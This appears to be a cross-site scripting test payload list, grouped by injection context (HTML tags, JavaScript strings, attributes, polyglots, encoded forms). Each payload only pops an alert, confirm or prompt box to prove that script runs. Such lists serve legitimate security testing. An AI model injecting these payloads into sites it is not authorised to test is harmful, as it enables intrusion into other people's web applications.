# XSS Test Payloads
# Categories: basic, event_handler, svg, polyglot, context_breakout

## Basic
<script>alert(1)</script>
<script>confirm(1)</script>
<script>prompt(1)</script>

## HTML context - tag injection
<img src=x onerror=alert(1)>
<img src=x onerror=confirm(1)>
<svg onload=alert(1)>
<body onload=alert(1)>
<input autofocus onfocus=alert(1)>
<details open ontoggle=alert(1)>
<select autofocus onfocus=alert(1)>
<textarea autofocus onfocus=alert(1)>

## JavaScript context - string breakout
'-alert(1)-'
';alert(1)//
";alert(1)//
\';alert(1)//
</script><script>alert(1)</script>

## Attribute context - breakout
" onmouseover=alert(1) "
' onmouseover=alert(1) '

## Polyglot
"onfocus=alert(1) autofocus="
'--><script>alert(1)</script>

## Encoded variants
&#60;script&#62;alert(1)&#60;/script&#62;
%3Cscript%3Ealert(1)%3C/script%3E
